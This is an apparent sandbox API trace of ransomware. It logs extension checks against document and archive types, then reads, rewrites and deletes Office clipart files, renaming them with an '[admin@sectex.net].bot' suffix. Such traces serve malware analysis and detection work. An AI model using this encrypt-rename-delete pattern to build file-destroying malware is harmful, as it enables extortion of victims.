	[0154.918] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.918] lstrlenW (lpString=".rar") returned 4
	[0154.918] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.918] lstrlenW (lpString=".bz2") returned 4
	[0154.919] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString=".7z") returned 3
	[0154.919] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.919] lstrlenW (lpString=".dbf") returned 4
	[0154.919] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.919] lstrlenW (lpString=".1cd") returned 4
	[0154.919] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.919] lstrlenW (lpString=".jpg") returned 4
	[0154.919] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.919] lstrlenW (lpString=".doc") returned 4
	[0154.919] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString=".docx") returned 5
	[0154.919] lstrcmpiW (lpString1=".docx", lpString2="1.BMP") returned -1
	[0154.919] lstrlenW (lpString=".pdf") returned 4
	[0154.919] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString=".xls") returned 4
	[0154.919] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString=".xlsx") returned 5
	[0154.919] lstrcmpiW (lpString1=".xlsx", lpString2="1.BMP") returned -1
	[0154.919] lstrlenW (lpString=".ppt") returned 4
	[0154.919] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.919] lstrlenW (lpString=".zip") returned 4
	[0154.919] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.919] lstrlenW (lpString=".rar") returned 4
	[0154.919] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.920] lstrlenW (lpString=".bz2") returned 4
	[0154.920] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.920] lstrlenW (lpString=".7z") returned 3
	[0154.920] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.920] lstrlenW (lpString=".dbf") returned 4
	[0154.920] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.920] lstrlenW (lpString=".1cd") returned 4
	[0154.920] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101861.BMP") returned 63
	[0154.920] lstrlenW (lpString=".jpg") returned 4
	[0154.920] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.920] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.920] lstrlenW (lpString="J0101862.BMP") returned 12
	[0154.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.921] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32184) returned 1
	[0154.921] CloseHandle (hObject=0x3b4) returned 1
	[0154.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp")) returned 0x20
	[0154.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.921] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.921] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0154.922] GetLastError () returned 0x0
	[0154.922] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7db8, lpOverlapped=0x0) returned 1
	[0154.924] WriteFile (in: hFile=0x298, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0154.926] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.926] WriteFile (in: hFile=0x298, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.926] SetEndOfFile (hFile=0x298) returned 1
	[0154.926] CloseHandle (hObject=0x298) returned 1
	[0154.926] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.926] SetEndOfFile (hFile=0x3b4) returned 1
	[0154.934] CloseHandle (hObject=0x3b4) returned 1
	[0154.934] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.934] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101862.bmp")) returned 1
	[0154.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.935] lstrlenW (lpString=".doc") returned 4
	[0154.935] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.935] lstrlenW (lpString=".docx") returned 5
	[0154.935] lstrcmpiW (lpString1=".docx", lpString2="2.BMP") returned -1
	[0154.935] lstrlenW (lpString=".pdf") returned 4
	[0154.935] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.935] lstrlenW (lpString=".xls") returned 4
	[0154.935] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.935] lstrlenW (lpString=".xlsx") returned 5
	[0154.935] lstrcmpiW (lpString1=".xlsx", lpString2="2.BMP") returned -1
	[0154.935] lstrlenW (lpString=".ppt") returned 4
	[0154.935] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.935] lstrlenW (lpString=".zip") returned 4
	[0154.935] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.935] lstrlenW (lpString=".rar") returned 4
	[0154.935] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.935] lstrlenW (lpString=".bz2") returned 4
	[0154.935] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.935] lstrlenW (lpString=".7z") returned 3
	[0154.935] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.936] lstrlenW (lpString=".dbf") returned 4
	[0154.936] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.936] lstrlenW (lpString=".1cd") returned 4
	[0154.936] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.936] lstrlenW (lpString=".jpg") returned 4
	[0154.936] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.936] lstrlenW (lpString=".doc") returned 4
	[0154.936] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString=".docx") returned 5
	[0154.936] lstrcmpiW (lpString1=".docx", lpString2="2.BMP") returned -1
	[0154.936] lstrlenW (lpString=".pdf") returned 4
	[0154.936] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString=".xls") returned 4
	[0154.936] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString=".xlsx") returned 5
	[0154.936] lstrcmpiW (lpString1=".xlsx", lpString2="2.BMP") returned -1
	[0154.936] lstrlenW (lpString=".ppt") returned 4
	[0154.936] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.936] lstrlenW (lpString=".zip") returned 4
	[0154.936] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString=".rar") returned 4
	[0154.936] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0154.936] lstrlenW (lpString=".bz2") returned 4
	[0154.937] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0154.937] lstrlenW (lpString=".7z") returned 3
	[0154.937] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0154.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.937] lstrlenW (lpString=".dbf") returned 4
	[0154.937] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0154.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.937] lstrlenW (lpString=".1cd") returned 4
	[0154.937] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0154.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101862.BMP") returned 63
	[0154.937] lstrlenW (lpString=".jpg") returned 4
	[0154.937] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0154.937] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0154.937] lstrlenW (lpString="J0101863.BMP") returned 12
	[0154.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.938] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32184) returned 1
	[0154.938] CloseHandle (hObject=0x3b4) returned 1
	[0154.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp")) returned 0x20
	[0154.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0154.938] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.938] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298
	[0154.939] GetLastError () returned 0x0
	[0154.939] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7db8, lpOverlapped=0x0) returned 1
	[0155.241] WriteFile (in: hFile=0x298, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0155.265] ReadFile (in: hFile=0x3b4, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.265] WriteFile (in: hFile=0x298, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.265] SetEndOfFile (hFile=0x298) returned 1
	[0155.265] CloseHandle (hObject=0x298) returned 1
	[0155.265] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.265] SetEndOfFile (hFile=0x3b4) returned 1
	[0155.268] CloseHandle (hObject=0x3b4) returned 1
	[0155.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.268] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101863.bmp")) returned 1
	[0155.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.269] lstrlenW (lpString=".doc") returned 4
	[0155.269] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString=".docx") returned 5
	[0155.269] lstrcmpiW (lpString1=".docx", lpString2="3.BMP") returned -1
	[0155.269] lstrlenW (lpString=".pdf") returned 4
	[0155.269] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString=".xls") returned 4
	[0155.269] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString=".xlsx") returned 5
	[0155.269] lstrcmpiW (lpString1=".xlsx", lpString2="3.BMP") returned -1
	[0155.269] lstrlenW (lpString=".ppt") returned 4
	[0155.269] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.269] lstrlenW (lpString=".zip") returned 4
	[0155.269] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString=".rar") returned 4
	[0155.269] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString=".bz2") returned 4
	[0155.269] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString=".7z") returned 3
	[0155.269] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.269] lstrlenW (lpString=".dbf") returned 4
	[0155.269] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.269] lstrlenW (lpString=".1cd") returned 4
	[0155.269] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.270] lstrlenW (lpString=".jpg") returned 4
	[0155.270] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.270] lstrlenW (lpString=".doc") returned 4
	[0155.270] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString=".docx") returned 5
	[0155.270] lstrcmpiW (lpString1=".docx", lpString2="3.BMP") returned -1
	[0155.270] lstrlenW (lpString=".pdf") returned 4
	[0155.270] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString=".xls") returned 4
	[0155.270] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString=".xlsx") returned 5
	[0155.270] lstrcmpiW (lpString1=".xlsx", lpString2="3.BMP") returned -1
	[0155.270] lstrlenW (lpString=".ppt") returned 4
	[0155.270] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.270] lstrlenW (lpString=".zip") returned 4
	[0155.270] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString=".rar") returned 4
	[0155.270] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString=".bz2") returned 4
	[0155.270] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString=".7z") returned 3
	[0155.270] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.270] lstrlenW (lpString=".dbf") returned 4
	[0155.270] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.270] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.270] lstrlenW (lpString=".1cd") returned 4
	[0155.270] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101863.BMP") returned 63
	[0155.271] lstrlenW (lpString=".jpg") returned 4
	[0155.271] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.271] lstrcmpiW (lpString1=".BMP", lpString2=".bot") returned -1
	[0155.271] lstrlenW (lpString="J0101867.BMP") returned 12
	[0155.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.487] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32616) returned 1
	[0155.487] CloseHandle (hObject=0x384) returned 1
	[0155.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp")) returned 0x20
	[0155.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0155.783] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.783] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0155.783] GetLastError () returned 0x0
	[0155.783] ReadFile (in: hFile=0x3bc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7f68, lpOverlapped=0x0) returned 1
	[0155.802] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7f70, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7f70, lpOverlapped=0x0) returned 1
	[0155.803] ReadFile (in: hFile=0x3bc, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.803] WriteFile (in: hFile=0x3ac, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.803] SetEndOfFile (hFile=0x3ac) returned 1
	[0155.803] CloseHandle (hObject=0x3ac) returned 1
	[0155.803] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.803] SetEndOfFile (hFile=0x3bc) returned 1
	[0155.806] CloseHandle (hObject=0x3bc) returned 1
	[0155.806] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.872] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp")) returned 1
	[0155.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.873] lstrlenW (lpString=".doc") returned 4
	[0155.873] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.873] lstrlenW (lpString=".docx") returned 5
	[0155.873] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1
	[0155.873] lstrlenW (lpString=".pdf") returned 4
	[0155.873] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.873] lstrlenW (lpString=".xls") returned 4
	[0155.873] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.873] lstrlenW (lpString=".xlsx") returned 5
	[0155.873] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1
	[0155.873] lstrlenW (lpString=".ppt") returned 4
	[0155.873] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63
	[0155.873] lstrlenW (lpString=".zip") returned 4
	[0155.873] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.873] lstrlenW (lpString=".rar") returned 4
	[0155.874] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString=".bz2") returned 4
	[0155.874] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.874] lstrlenW (lpString=".7z") returned 3
	[0155.874] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
